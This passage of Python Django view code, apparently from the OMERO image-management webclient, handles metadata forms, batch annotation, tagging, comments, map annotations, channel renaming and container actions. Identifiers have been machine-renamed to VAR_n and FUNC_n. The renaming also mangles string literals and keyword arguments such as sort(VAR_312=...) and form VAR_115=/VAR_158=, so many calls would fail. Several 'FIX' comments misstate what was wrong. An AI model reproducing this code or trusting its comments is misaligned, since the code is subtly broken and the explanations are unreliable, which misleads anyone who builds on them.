                            )
                VAR_391["label"] = ch.getLabel()
                VAR_351 = ch.getColor()
                VAR_391["color"] = VAR_351 is not None and VAR_351.getHtml() or None
                VAR_392 = (
                    VAR_104.image
                    and VAR_104.image.getPrimaryPixels().copyPlaneInfo(
                        theC=theC, theZ=0
                    )
                )
                VAR_393 = []
                for pi in VAR_392:
                    VAR_427 = pi.getDeltaT(units="SECOND")
                    VAR_428 = pi.getExposureTime(units="SECOND")
                    if VAR_427 is None and VAR_428 is None:
                        continue
                    if VAR_427 is not None:
                        # FIX: was deltaT.getValue() - undefined name.
                        VAR_427 = VAR_427.getValue()
                    if VAR_428 is not None:
                        # FIX: was exposure.getValue() - undefined name.
                        VAR_428 = VAR_428.getValue()
                    VAR_393.append(
                        {"theT": pi.theT, "deltaT": VAR_427, "exposureTime": VAR_428}
                    )
                VAR_391["plane_info"] = VAR_393
                VAR_134.append(VAR_391)
        try:
            VAR_142 = VAR_104.well.getWellSample().image()
        except Exception:
            VAR_142 = VAR_104.image
        if VAR_25 is None:  # 9853
            if VAR_142.getObjectiveSettings() is not None:
                if VAR_139 is None:
                    VAR_139 = list(VAR_6.getEnumerationEntries("MediumI"))
                if VAR_140 is None:
                    VAR_140 = list(VAR_6.getEnumerationEntries("ImmersionI"))
                if VAR_141 is None:
                    VAR_141 = list(VAR_6.getEnumerationEntries("CorrectionI"))
                VAR_127 = MetadataObjectiveSettingsForm(
                    VAR_115={
                        "objectiveSettings": VAR_142.getObjectiveSettings(),
                        "objective": VAR_142.getObjectiveSettings().getObjective(),
                        "mediums": VAR_139,
                        "immersions": VAR_140,
                        "corrections": VAR_141,
                    }
                )
            if VAR_142.getImagingEnvironment() is not None:
                VAR_126 = MetadataEnvironmentForm(VAR_115={"image": VAR_142})
            if VAR_142.getStageLabel() is not None:
                VAR_130 = MetadataStageLabelForm(VAR_115={"image": VAR_142})
            VAR_354 = VAR_142.getInstrument()
            if VAR_354 is not None:
                if VAR_354.getMicroscope() is not None:
                    VAR_128 = MetadataMicroscopeForm(
                        VAR_115={
                            "microscopeTypes": list(
                                VAR_6.getEnumerationEntries("MicroscopeTypeI")
                            ),
                            "microscope": VAR_354.getMicroscope(),
                        }
                    )
                VAR_394 = VAR_354.getObjectives()
                for o in VAR_394:
                    if VAR_139 is None:
                        VAR_139 = list(VAR_6.getEnumerationEntries("MediumI"))
                    if VAR_140 is None:
                        VAR_140 = list(VAR_6.getEnumerationEntries("ImmersionI"))
                    if VAR_141 is None:
                        VAR_141 = list(VAR_6.getEnumerationEntries("CorrectionI"))
                    VAR_429 = MetadataObjectiveForm(
                        VAR_115={
                            "objective": o,
                            "mediums": VAR_139,
                            "immersions": VAR_140,
                            "corrections": VAR_141,
                        },
                        auto_id=False,
                    )
                    VAR_129.append(VAR_429)
                VAR_395 = list(VAR_354.getFilters())
                if len(VAR_395) > 0:
                    for f in VAR_395:
                        VAR_437 = MetadataFilterForm(
                            VAR_115={
                                "filter": f,
                                "types": list(
                                    VAR_6.getEnumerationEntries("FilterTypeI")
                                ),
                            },
                            auto_id=False,
                        )
                        VAR_131.append(VAR_437)
                VAR_396 = list(VAR_354.getDichroics())
                for VAR_364 in VAR_396:
                    VAR_430 = MetadataDichroicForm(
                        VAR_115={"dichroic": VAR_364}, auto_id=False
                    )
                    VAR_132.append(VAR_430)
                VAR_397 = list(VAR_354.getDetectors())
                if len(VAR_397) > 0:
                    for VAR_364 in VAR_397:
                        VAR_438 = MetadataDetectorForm(
                            VAR_115={
                                "detectorSettings": None,
                                "detector": VAR_364,
                                "types": list(
                                    VAR_6.getEnumerationEntries("DetectorTypeI")
                                ),
                            },
                            auto_id=False,
                        )
                        VAR_133.append(VAR_438)
                VAR_398 = list(VAR_354.getLightSources())
                if len(VAR_398) > 0:
                    for laser in VAR_398:
                        VAR_439 = VAR_136
                        if laser.OMERO_CLASS == "Arc":
                            VAR_439 = VAR_137
                        elif laser.OMERO_CLASS == "Filament":
                            VAR_439 = VAR_138
                        VAR_440 = MetadataLightSourceForm(
                            VAR_115={
                                "lightSource": laser,
                                "lstypes": VAR_439,
                                "mediums": list(
                                    VAR_6.getEnumerationEntries("LaserMediumI")
                                ),
                                "pulses": list(VAR_6.getEnumerationEntries("PulseI")),
                            },
                            auto_id=False,
                        )
                        VAR_135.append(VAR_440)
    VAR_53 = {"manager": VAR_104, "share_id": VAR_25}
    if VAR_23 not in ("share", "discussion", "tag"):
        VAR_53["form_channels"] = VAR_134
        VAR_53["form_environment"] = VAR_126
        VAR_53["form_objective"] = VAR_127
        VAR_53["form_microscope"] = VAR_128
        VAR_53["form_instrument_objectives"] = VAR_129
        VAR_53["form_filters"] = VAR_131
        VAR_53["form_dichroics"] = VAR_132
        VAR_53["form_detectors"] = VAR_133
        VAR_53["form_lasers"] = VAR_135
        VAR_53["form_stageLabel"] = VAR_130
    VAR_53["template"] = VAR_54
    return VAR_53
@login_required()
@render_response()
def FUNC_42(VAR_2, VAR_26, VAR_6=None, VAR_25=None, **VAR_7):
    """Load an image's original file metadata (global + series) for display.

    Returns the template context, a 404 if the image is missing, or a 408
    response if the metadata load times out server-side.
    """
    VAR_142 = VAR_6.getObject("Image", VAR_26)
    if VAR_142 is None:
        raise Http404("No Image found with ID %s" % VAR_26)
    VAR_53 = {
        "template": "webclient/annotations/original_metadata.html",
        "imageId": VAR_142.getId(),
    }
    try:
        VAR_181 = VAR_142.loadOriginalMetadata()
        if VAR_181 is not None:
            VAR_53["original_metadata"] = VAR_181[0]
            VAR_53["global_metadata"] = VAR_181[1]
            VAR_53["series_metadata"] = VAR_181[2]
    except omero.LockTimeout:
        # FIX: HttpResponse kwargs are content=/status= - the names had
        # been mangled (TypeError with Django's HttpResponse).
        return HttpResponse(content="LockTimeout", status=408)
    return VAR_53
def FUNC_43(VAR_2, VAR_6=None):
    """Resolve object ids named in the request into wrapper-object lists.

    Reads id lists from GET (or POST, if GET is empty) for each supported
    type and returns {type_name: [wrappers]}; "share" resolves only the
    first id via getShare.
    """
    params = VAR_2.GET or VAR_2.POST

    def _load(param, model):
        # Fetch wrappers for the ids under `param`, or an empty list.
        ids = params.getlist(param)
        if len(ids) > 0:
            return list(VAR_6.getObjects(model, ids))
        return list()

    share_ids = params.getlist("share")
    return {
        "image": _load("image", "Image"),
        "dataset": _load("dataset", "Dataset"),
        "project": _load("project", "Project"),
        "screen": _load("screen", "Screen"),
        "plate": _load("plate", "Plate"),
        "acquisition": _load("acquisition", "PlateAcquisition"),
        "well": _load("well", "Well"),
        "share": [VAR_6.getShare(share_ids[0])] if len(share_ids) > 0 else list(),
    }
def FUNC_44(VAR_2):
    """Collect the raw id lists for each object type from the request.

    Returns a dict keyed by the plural type name ("images", "datasets", ...)
    of the id strings given under the singular query-param names.
    """
    params = VAR_2.GET or VAR_2.POST
    plural_to_param = (
        ("images", "image"),
        ("datasets", "dataset"),
        ("projects", "project"),
        ("screens", "screen"),
        ("plates", "plate"),
        ("acquisitions", "acquisition"),
        ("wells", "well"),
        ("shares", "share"),
    )
    return {plural: params.getlist(param) for plural, param in plural_to_param}
@login_required()
@render_response()
def FUNC_45(VAR_2, VAR_6=None, **VAR_7):
    """Build the batch-annotate panel context for the selected objects.

    Collects the selected objects (via FUNC_43), checks they share a single
    group and are annotatable, gathers fileset/archived file info for
    images, and returns the template context for the batch-annotate form.
    """
    VAR_143 = FUNC_43(VAR_2, VAR_6)
    VAR_144 = []
    VAR_145 = []
    VAR_146 = set()
    VAR_147 = False
    for VAR_312 in VAR_143:
        # "type=id" tokens used to rebuild query strings / link ids below.
        VAR_144 += ["%s=%s" % (VAR_312, o.id) for o in VAR_143[VAR_312]]
        for o in VAR_143[VAR_312]:
            VAR_146.add(o.getDetails().group.id.val)
            if not o.canAnnotate():
                VAR_147 = (
                    "Can't add annotations because you don't" " have permissions"
                )
            VAR_145.append({"type": VAR_312.title(), "id": o.id, "name": o.getName()})
    VAR_148 = "&".join(VAR_144)
    VAR_149 = "|".join(VAR_144).replace("=", "-")
    if len(VAR_146) == 0:
        # Nothing resolvable was selected.
        if (
            len(VAR_2.GET.getlist("tag")) > 0
            or len(VAR_2.GET.getlist("tagset")) > 0
        ):
            return HttpResponse("<h2>Can't batch annotate VAR_164</h2>")
        else:
            return handlerInternalError(VAR_2, "No objects found")
    VAR_150 = list(VAR_146)[0]
    VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_150)
    VAR_104 = BaseContainer(VAR_6)
    VAR_117 = VAR_104.listFigureScripts(VAR_143)
    VAR_151 = VAR_104.canExportAsJpg(VAR_2, VAR_143)
    VAR_152 = None
    VAR_153 = []
    if "image" in VAR_143 and len(VAR_143["image"]) > 0:
        VAR_153 = [VAR_320.getId() for VAR_320 in VAR_143["image"]]
    if len(VAR_153) > 0:
        # Combine fileset and archived-file counts/sizes for the UI.
        VAR_152 = VAR_6.getFilesetFilesInfo(VAR_153)
        VAR_283 = VAR_6.getArchivedFilesInfo(VAR_153)
        VAR_152["count"] += VAR_283["count"]
        VAR_152["size"] += VAR_283["size"]
    VAR_53 = {
        "iids": VAR_153,
        "obj_string": VAR_148,
        "link_string": VAR_149,
        "obj_labels": VAR_145,
        "batch_ann": True,
        "figScripts": VAR_117,
        "canExportAsJpg": VAR_151,
        "filesetInfo": VAR_152,
        "annotationBlocked": VAR_147,
        "differentGroups": False,
    }
    if len(VAR_146) > 1:
        VAR_53["annotationBlocked"] = (
            "Can't add annotations because" " objects are in different groups"
        )
        VAR_53["differentGroups"] = True  # E.g. don't run VAR_203 etc
    VAR_53["canDownload"] = VAR_104.canDownload(VAR_143)
    VAR_53["template"] = "webclient/annotations/FUNC_45.html"
    VAR_53["webclient_path"] = VAR_352("webindex")
    VAR_53["annotationCounts"] = VAR_104.getBatchAnnotationCounts(
        FUNC_43(VAR_2, VAR_6)
    )
    return VAR_53
@login_required()
@render_response()
def FUNC_46(VAR_2, VAR_6=None, **VAR_7):
    """Show (GET) or save (POST) file-annotation links for selected objects.

    GET renders the files form listing attachable files; POST links the
    chosen existing files and/or an uploaded file to the selection and
    returns the new annotation ids as JSON.
    """
    VAR_154 = FUNC_43(VAR_2, VAR_6)
    VAR_114 = FUNC_44(VAR_2)
    VAR_115 = {
        "selected": VAR_114,
        "images": VAR_154["image"],
        "datasets": VAR_154["dataset"],
        "projects": VAR_154["project"],
        "screens": VAR_154["screen"],
        "plates": VAR_154["plate"],
        "acquisitions": VAR_154["acquisition"],
        "wells": VAR_154["well"],
    }
    # Switch to the group of the first selected object.
    for obs in VAR_154.values():
        if len(obs) > 0:
            VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
            break
    VAR_155 = sum([len(VAR_114[types]) for types in VAR_114])
    if VAR_155 == 0:
        raise Http404("Need to specify objects via e.g. ?VAR_142=1")
    VAR_104 = None
    if VAR_155 == 1:
        for VAR_433 in VAR_114:
            if len(VAR_114[VAR_433]) > 0:
                VAR_28 = VAR_433[:-1]  # "images" -> "image"
                VAR_29 = VAR_114[VAR_433][0]
                break
        if VAR_28 in (
            "dataset",
            "project",
            "image",
            "screen",
            "plate",
            "acquisition",
            "well",
            "comment",
            "file",
            "tag",
            "tagset",
        ):
            if VAR_28 == "tagset":
                VAR_28 = "tag"
            VAR_94 = {}
            if VAR_28 is not None and int(VAR_29) > 0:
                VAR_94[VAR_347(VAR_28)] = int(VAR_29)
            try:
                VAR_104 = BaseContainer(VAR_6, **VAR_94)
            except AttributeError as x:
                return handlerInternalError(VAR_2, x)
    if VAR_104 is not None:
        VAR_284 = VAR_104.getFilesByObject()
    else:
        VAR_104 = BaseContainer(VAR_6)
        for VAR_215, VAR_143 in VAR_154.items():
            if len(VAR_143) > 0:
                VAR_284 = VAR_104.getFilesByObject(
                    VAR_12=VAR_215, parent_ids=[o.getId() for o in VAR_143]
                )
                break
    VAR_115["files"] = VAR_284
    if VAR_2.method == "POST":
        # FIX: was VAR_115=initial - "initial" is undefined (NameError);
        # the form's initial data is the VAR_115 dict built above.
        VAR_285 = FilesAnnotationForm(VAR_115=VAR_115, VAR_158=VAR_2.POST.copy())
        if VAR_285.is_valid():
            VAR_284 = VAR_285.cleaned_data["files"]
            VAR_355 = []
            if VAR_284 is not None and len(VAR_284) > 0:
                VAR_355 = VAR_104.createAnnotationsLinks("file", VAR_284, VAR_154)
            VAR_234 = (
                "annotation_file" in VAR_2.FILES
                and VAR_2.FILES["annotation_file"]
                or None
            )
            if VAR_234 is not None and VAR_234 != "":
                VAR_399 = VAR_104.createFileAnnotations(VAR_234, VAR_154)
                VAR_355.append(VAR_399)
            return JsonResponse({"fileIds": VAR_355})
        else:
            return HttpResponse(VAR_285.errors)
    else:
        # FIX: same undefined "initial" value on the GET branch.
        VAR_285 = FilesAnnotationForm(VAR_115=VAR_115)
    VAR_53 = {"form_file": VAR_285}
    VAR_54 = "webclient/annotations/files_form.html"
    VAR_53["template"] = VAR_54
    return VAR_53
@login_required()
@render_response()
def FUNC_47(VAR_2, VAR_6=None, **VAR_7):
    """Apply the POSTed rating to every selected object."""
    if VAR_2.method != "POST":
        raise Http404("Only POST supported")
    rating = getIntOrDefault(VAR_2, "rating", 0)
    for objects in FUNC_43(VAR_2, VAR_6).values():
        for obj in objects:
            obj.setRating(rating)
    return JsonResponse({"success": True})
@login_required()
@render_response()
def FUNC_48(VAR_2, VAR_6=None, **VAR_7):
    """Create a comment annotation (or share comment) from a POSTed form.

    When a share is selected, the comment is added to the share with a link
    back to the public template; otherwise comment annotations are created
    and linked to every selected object.
    """
    if VAR_2.method != "POST":
        raise Http404("Unbound instance of VAR_22 not available.")
    VAR_154 = FUNC_43(VAR_2, VAR_6)
    VAR_114 = FUNC_44(VAR_2)
    VAR_115 = {
        "selected": VAR_114,
        "images": VAR_154["image"],
        "datasets": VAR_154["dataset"],
        "projects": VAR_154["project"],
        "screens": VAR_154["screen"],
        "plates": VAR_154["plate"],
        "acquisitions": VAR_154["acquisition"],
        "wells": VAR_154["well"],
        "shares": VAR_154["share"],
    }
    if len(VAR_154["share"]) < 1:
        # Not a share comment: switch to the first object's group.
        for obs in VAR_154.values():
            if len(obs) > 0:
                VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
                break
    # FIX: was VAR_115=initial - "initial" is undefined (NameError);
    # the form's initial data is the VAR_115 dict built above.
    VAR_157 = CommentAnnotationForm(VAR_115=VAR_115, VAR_158=VAR_2.POST.copy())
    if VAR_157.is_valid():
        VAR_286 = VAR_157.cleaned_data["comment"]
        if VAR_286 is not None and VAR_286 != "":
            if VAR_154["share"] is not None and len(VAR_154["share"]) > 0:
                VAR_400 = VAR_154["share"][0].id
                VAR_104 = BaseShare(VAR_6, VAR_400)
                # Include an absolute link back to the public share page.
                VAR_401 = "%s?server=%i" % (
                    VAR_2.build_absolute_uri(
                        VAR_352("load_template", args=["public"])
                    ),
                    int(VAR_6.server_id),
                )
                VAR_402 = VAR_104.addComment(VAR_401, VAR_286)
                VAR_53 = {
                    "tann": VAR_402,
                    "added_by": VAR_6.getUserId(),
                    "template": "webclient/annotations/comment.html",
                }
            else:
                VAR_104 = BaseContainer(VAR_6)
                VAR_34 = VAR_104.createCommentAnnotations(VAR_286, VAR_154)
                VAR_53 = {"annId": VAR_34, "added_by": VAR_6.getUserId()}
            return VAR_53
    else:
        return HttpResponse(VAR_347(VAR_157.errors))
@login_required()
@render_response()
def FUNC_49(VAR_2, VAR_6=None, **VAR_7):
    """Create, update or delete map annotations on the selected objects.

    POST params: "mapAnnotation" (JSON list of [key, value] pairs), "annId"
    (existing annotation ids to update/delete), "ns" (namespace) and
    "duplicate" (create one annotation per object instead of sharing one).
    Returns {"annId": ids-or-None}.
    """
    if VAR_2.method != "POST":
        raise Http404(
            "Need to POST map annotation VAR_158 as list of" " ['key', 'value'] pairs"
        )
    VAR_154 = FUNC_43(VAR_2, VAR_6)
    if len(VAR_154["share"]) < 1:
        # Use the group of the first selected object for new annotations.
        for obs in VAR_154.values():
            if len(obs) > 0:
                VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
                break
    VAR_158 = VAR_2.POST.get("mapAnnotation")
    VAR_158 = json.loads(VAR_158)
    VAR_159 = VAR_2.POST.getlist("annId")
    VAR_90 = VAR_2.POST.get("ns", omero.constants.metadata.NSCLIENTMAPANNOTATION)
    if len(VAR_159) == 0 and len(VAR_158) > 0:
        VAR_287 = VAR_2.POST.get("duplicate", "false")
        # Fix: the comparison result was discarded, leaving VAR_287 a
        # (always-truthy) string; assign the boolean it computes.
        VAR_287 = VAR_287.lower() == "true"
        if VAR_90 == omero.constants.metadata.NSCLIENTMAPANNOTATION:
            # Client map annotations are always duplicated per object.
            VAR_287 = True
        if VAR_287:
            # One new annotation per selected object.
            for VAR_415, VAR_143 in VAR_154.items():
                for VAR_38 in VAR_143:
                    VAR_180 = omero.gateway.MapAnnotationWrapper(VAR_6)
                    VAR_180.setValue(VAR_158)
                    VAR_180.setNs(VAR_90)
                    VAR_180.save()
                    VAR_159.append(VAR_180.getId())
                    VAR_38.linkAnnotation(VAR_180)
        else:
            # One shared annotation linked to every selected object.
            VAR_180 = omero.gateway.MapAnnotationWrapper(VAR_6)
            VAR_180.setValue(VAR_158)
            VAR_180.setNs(VAR_90)
            VAR_180.save()
            VAR_159.append(VAR_180.getId())
            for VAR_415, VAR_143 in VAR_154.items():
                for VAR_38 in VAR_143:
                    VAR_38.linkAnnotation(VAR_180)
    else:
        # Update (non-empty data) or delete (empty data) existing annotations.
        for VAR_34 in VAR_159:
            VAR_180 = VAR_6.getObject("MapAnnotation", VAR_34)
            if VAR_180 is None:
                continue
            if len(VAR_158) > 0:
                VAR_180.setValue(VAR_158)
                VAR_180.save()
            else:
                VAR_84 = VAR_6.deleteObjects("/Annotation", [VAR_34])
                try:
                    VAR_6._waitOnCmd(VAR_84)
                finally:
                    VAR_84.close()
        if len(VAR_158) == 0:
            VAR_159 = None
    return {"annId": VAR_159}
@login_required()
@render_response()
def FUNC_50(VAR_2, VAR_6=None, **VAR_7):
    """Return tag listings in several JSON shapes, chosen by GET "jsonmode".

    Modes: "tagcount" (just the count), "tags" (id/value/owner tuples),
    "desc" (id -> description), "owners" (owner map). Optional "offset" /
    "limit" GET params page the recursive tag load.
    """
    VAR_101 = FUNC_0(VAR_2, "group", -1)
    VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_347(VAR_101))
    try:
        VAR_177 = int(VAR_2.GET.get("offset"))
        VAR_88 = int(VAR_2.GET.get("limit", 1000))
    except Exception:
        # Missing/invalid paging params: load everything.
        VAR_177 = VAR_88 = None
    VAR_160 = VAR_2.GET.get("jsonmode")
    if VAR_160 == "tagcount":
        VAR_288 = VAR_6.getTagCount()
        # Fix: 'tag_count' was an undefined name (NameError).
        return dict(VAR_288=VAR_288)
    VAR_104 = BaseContainer(VAR_6)
    # Fix: 'offset'/'limit' were undefined names; pass the parsed values.
    VAR_104.loadTagsRecursive(eid=-1, VAR_177=VAR_177, VAR_88=VAR_88)
    VAR_161 = VAR_104.tags_recursive
    VAR_162 = VAR_104.tags_recursive_owners
    if VAR_160 == "tags":
        VAR_71 = list((VAR_320, VAR_433, o, s) for VAR_320, VAR_364, VAR_433, o, s in VAR_161)
        return VAR_71
    elif VAR_160 == "desc":
        return dict((VAR_320, VAR_364) for VAR_320, VAR_364, VAR_433, o, s in VAR_161)
    elif VAR_160 == "owners":
        return VAR_162
    return HttpResponse()
@login_required()
@render_response()
def FUNC_51(VAR_2, VAR_6=None, **VAR_7):
    """Annotate the selected objects with tags (GET shows form, POST saves).

    On POST, links newly-chosen tags, creates tags from the "newtags"
    formset, and unlinks tags the user deselected (only the user's own
    links). Returns a JSON summary on POST, or the form template context.
    """
    VAR_154 = FUNC_43(VAR_2, VAR_6)
    VAR_114 = FUNC_44(VAR_2)
    VAR_155 = sum([len(VAR_114[types]) for types in VAR_114])
    VAR_104 = None
    VAR_163 = VAR_6.getEventContext().userId
    VAR_164 = []
    # Use the group of the first selected object.
    for obs in VAR_154.values():
        if len(obs) > 0:
            VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
            break
    VAR_165, VAR_166 = tree.marshal_annotations(
        VAR_6,
        VAR_44=VAR_114["projects"],
        VAR_45=VAR_114["datasets"],
        VAR_46=VAR_114["images"],
        VAR_47=VAR_114["screens"],
        VAR_48=VAR_114["plates"],
        VAR_85=VAR_114["acquisitions"],
        VAR_86=VAR_114["wells"],
        VAR_89="tag",
        VAR_88=VAR_1,
    )
    # Index annotation experimenters by id for name lookup below.
    VAR_167 = {}
    for VAR_232 in VAR_166:
        VAR_167[VAR_232["id"]] = VAR_232
    if VAR_155 > 1:
        # Multiple objects selected: keep only tags the current user has
        # linked to EVERY selected object.
        VAR_289 = {}
        for VAR_433 in VAR_165:
            VAR_356 = VAR_433["id"]
            if VAR_356 not in VAR_289:
                VAR_289[VAR_356] = 0
            if VAR_433["link"]["owner"]["id"] == VAR_163:
                VAR_289[VAR_356] += 1
        VAR_165 = [VAR_433 for VAR_433 in VAR_165 if VAR_289[VAR_433["id"]] == VAR_155]
    VAR_168 = []
    for tag in VAR_165:
        VAR_290 = tag["link"]["owner"]["id"]
        VAR_103 = VAR_167[VAR_290]
        VAR_291 = "%s %s" % (VAR_103["firstName"], VAR_103["lastName"])
        VAR_292 = True
        VAR_293 = tag["link"]["date"]
        VAR_294 = VAR_290 == VAR_163
        VAR_168.append(
            (tag["id"], VAR_163, VAR_291, VAR_292, VAR_293, VAR_294)
        )
    VAR_168.sort(VAR_312=lambda x: x[0])
    VAR_115 = {
        "selected": VAR_114,
        "images": VAR_154["image"],
        "datasets": VAR_154["dataset"],
        "projects": VAR_154["project"],
        "screens": VAR_154["screen"],
        "plates": VAR_154["plate"],
        "acquisitions": VAR_154["acquisition"],
        "wells": VAR_154["well"],
    }
    if VAR_2.method == "POST":
        # Fix: the forms' initial data is the dict built above ('initial'
        # was an undefined name here, raising NameError).
        VAR_295 = TagsAnnotationForm(VAR_115=VAR_115, VAR_158=VAR_2.POST.copy())
        VAR_296 = NewTagsAnnotationFormSet(
            prefix="newtags", VAR_158=VAR_2.POST.copy()
        )
        if VAR_295.is_valid() and VAR_296.is_valid():
            # Diff the user's existing tag links against the submitted set.
            VAR_357 = [stag[0] for stag in VAR_168 if stag[5]]
            VAR_357 = list(set(VAR_357))
            VAR_358 = list(VAR_295.cleaned_data["tags"])
            VAR_164 = [tag for tag in VAR_358 if tag not in VAR_357]
            VAR_359 = [tag for tag in VAR_357 if tag not in VAR_358]
            VAR_104 = BaseContainer(VAR_6)
            if VAR_164:
                VAR_104.createAnnotationsLinks("tag", VAR_164, VAR_154)
            VAR_360 = []
            for VAR_22 in VAR_296.forms:
                VAR_360.append(
                    VAR_104.createTagAnnotations(
                        VAR_22.cleaned_data["tag"],
                        VAR_22.cleaned_data["description"],
                        VAR_154,
                        tag_group_id=VAR_22.cleaned_data["tagset"],
                    )
                )
            for remove in VAR_359:
                VAR_403 = BaseContainer(VAR_6, tag=remove)
                VAR_403.remove(
                    [
                        "%s-%s" % (VAR_215, VAR_38.id)
                        for VAR_215, VAR_143 in VAR_154.items()
                        for VAR_38 in VAR_143
                    ],
                    tag_owner_id=VAR_163,
                )
            return JsonResponse({"added": VAR_164, "removed": VAR_359, "new": VAR_360})
        else:
            return HttpResponse(VAR_347(VAR_295.errors))
    else:
        # GET: render the tagging form (same 'initial' fix as above).
        VAR_295 = TagsAnnotationForm(VAR_115=VAR_115)
        VAR_296 = NewTagsAnnotationFormSet(prefix="newtags")
        VAR_53 = {
            "form_tags": VAR_295,
            "newtags_formset": VAR_296,
            "selected_tags": VAR_168,
        }
        VAR_54 = "webclient/annotations/tags_form.html"
        VAR_53["template"] = VAR_54
        return VAR_53
@require_POST
@login_required()
@render_response()
def FUNC_52(VAR_2, VAR_26, VAR_6=None, **VAR_7):
    """Rename an image's channels from POST params "channel0".."channelN".

    With "confirm_apply" present, the names are applied server-side to the
    image (or to all images under "parentId"); the response echoes the new
    names plus the affected image/update counts.
    """
    image = VAR_6.getObject("Image", VAR_26)
    channel_count = image.getSizeC()
    names_by_key = {}    # "channel<i>" (0-based) -> name, echoed back
    names_by_index = {}  # channel index (1-based) -> name, for the API call
    for idx in range(channel_count):
        key = "channel%d" % idx
        new_name = VAR_2.POST.get(key, None)
        if new_name is None:
            continue
        new_name = smart_str(new_name)[:255]  # Truncate to fit in DB
        names_by_key[key] = new_name
        names_by_index[idx + 1] = new_name
    if VAR_2.POST.get("confirm_apply", None) is None:
        return {"error": "No VAR_413 found to apply Channel Names"}
    parent = VAR_2.POST.get("parentId", None)
    if parent is None:
        counts = VAR_6.setChannelNames("Image", [image.getId()], names_by_index)
    else:
        # "parentId" looks like "<type>-<id>", e.g. "dataset-123".
        parent_type = parent.split("-")[0].title()
        parent_id = VAR_241(parent.split("-")[1])
        counts = VAR_6.setChannelNames(
            parent_type, [parent_id], names_by_index, channelCount=channel_count
        )
    payload = {"channelNames": names_by_key}
    if counts:
        payload["imageCount"] = counts["imageCount"]
        payload["updateCount"] = counts["updateCount"]
    return payload
@login_required(setGroupContext=True)
@render_response()
def FUNC_53(
    VAR_2, VAR_27, VAR_28=None, VAR_29=None, VAR_6=None, **VAR_7
):
    """Dispatch a container-management action.

    VAR_27 selects the action ("addnewcontainer", "edit", "save",
    "editname", "savename", "editdescription", "savedescription", "remove",
    "removefromshare", "delete", "deletemany"); VAR_28/VAR_29 identify the
    target object type and id. Returns JSON for mutations or a template
    context for form actions.

    Fixes applied: undefined names 'owner' -> VAR_103, 'initial' -> VAR_115
    and 'rdict' -> VAR_363 (each previously raised NameError at runtime).
    """
    VAR_54 = None
    VAR_104 = None
    # Build a manager for the target object (or the share / a blank one).
    if VAR_28 in (
        "dataset",
        "project",
        "image",
        "screen",
        "plate",
        "acquisition",
        "well",
        "comment",
        "file",
        "tag",
        "tagset",
    ):
        VAR_94 = {}
        if VAR_28 is not None and int(VAR_29) > 0:
            VAR_29 = int(VAR_29)
            VAR_94[VAR_347(VAR_28)] = VAR_29
        try:
            VAR_104 = BaseContainer(VAR_6, **VAR_94)
        except AttributeError as x:
            return handlerInternalError(VAR_2, x)
    elif VAR_28 in ("share", "sharecomment", "chat"):
        VAR_104 = BaseShare(VAR_6, VAR_29)
    else:
        VAR_104 = BaseContainer(VAR_6)
    VAR_22 = None
    if VAR_27 == "addnewcontainer":
        if not VAR_2.method == "POST":
            return JsonResponse(
                {"Error": "Must use POST to create container"}, VAR_315=405
            )
        VAR_22 = ContainerForm(VAR_158=VAR_2.POST.copy())
        if VAR_22.is_valid():
            VAR_0.debug("Create new in %s: %s" % (VAR_28, VAR_347(VAR_22.cleaned_data)))
            VAR_3 = VAR_22.cleaned_data["name"]
            VAR_362 = VAR_22.cleaned_data["description"]
            VAR_103 = VAR_22.cleaned_data["owner"]
            if VAR_28 == "project" and hasattr(VAR_104, VAR_28) and VAR_29 > 0:
                VAR_40 = VAR_104.createDataset(VAR_3, VAR_362, VAR_103=VAR_103)
            elif VAR_28 == "tagset" and VAR_29 > 0:
                VAR_40 = VAR_104.createTag(VAR_3, VAR_362, VAR_103=VAR_103)
            elif VAR_2.POST.get("folder_type") in (
                "project",
                "screen",
                "dataset",
                "tag",
                "tagset",
            ):
                VAR_441 = VAR_2.POST.get("folder_type")
                if VAR_441 == "dataset":
                    VAR_40 = VAR_104.createDataset(
                        VAR_3,
                        VAR_362,
                        VAR_103=VAR_103,
                        img_ids=VAR_2.POST.getlist("image", None),
                    )
                else:
                    VAR_40 = VAR_6.createContainer(
                        VAR_441, VAR_3, VAR_362, VAR_103=VAR_103
                    )
            else:
                return HttpResponseServerError("Object does not exist")
            VAR_363 = {"bad": "false", "id": VAR_40}
            return JsonResponse(VAR_363)
        else:
            VAR_364 = dict()
            for e in VAR_22.errors.items():
                VAR_364.update({e[0]: unicode(e[1])})
            VAR_363 = {"bad": "true", "errs": VAR_364}
            return JsonResponse(VAR_363)
    elif VAR_27 == "edit":
        if VAR_29 is None:
            raise Http404("No share ID")
        if VAR_28 == "share" and int(VAR_29) > 0:
            VAR_54 = "webclient/public/share_form.html"
            VAR_104.getMembers(VAR_29)
            VAR_104.getComments(VAR_29)
            VAR_404 = list(VAR_6.getExperimenters())
            VAR_404.sort(VAR_312=lambda x: x.getOmeName().lower())
            VAR_115 = {
                "message": VAR_104.share.message,
                "expiration": "",
                "shareMembers": VAR_104.membersInShare,
                "enable": VAR_104.share.active,
                "experimenters": VAR_404,
            }
            if VAR_104.share.getExpireDate() is not None:
                VAR_115["expiration"] = VAR_104.share.getExpireDate().strftime(
                    "%Y-%m-%d"
                )
            VAR_22 = ShareForm(VAR_115=VAR_115)  # 'guests':share.guestsInShare,
            VAR_53 = {"manager": VAR_104, "form": VAR_22}
    elif VAR_27 == "save":
        if not VAR_2.method == "POST":
            return HttpResponseRedirect(
                VAR_352("manage_action_containers", args=["edit", VAR_28, VAR_29])
            )
        if VAR_28 == "share":
            VAR_404 = list(VAR_6.getExperimenters())
            VAR_404.sort(VAR_312=lambda x: x.getOmeName().lower())
            VAR_22 = ShareForm(
                VAR_115={"experimenters": VAR_404}, VAR_158=VAR_2.POST.copy()
            )
            if VAR_22.is_valid():
                VAR_0.debug("Update share: %s" % (VAR_347(VAR_22.cleaned_data)))
                VAR_382 = VAR_22.cleaned_data["message"]
                VAR_442 = VAR_22.cleaned_data["expiration"]
                VAR_64 = VAR_22.cleaned_data["members"]
                VAR_443 = VAR_22.cleaned_data["enable"]
                VAR_401 = "%s?server=%i" % (
                    VAR_2.build_absolute_uri(
                        VAR_352("load_template", args=["public"])
                    ),
                    int(VAR_6.server_id),
                )
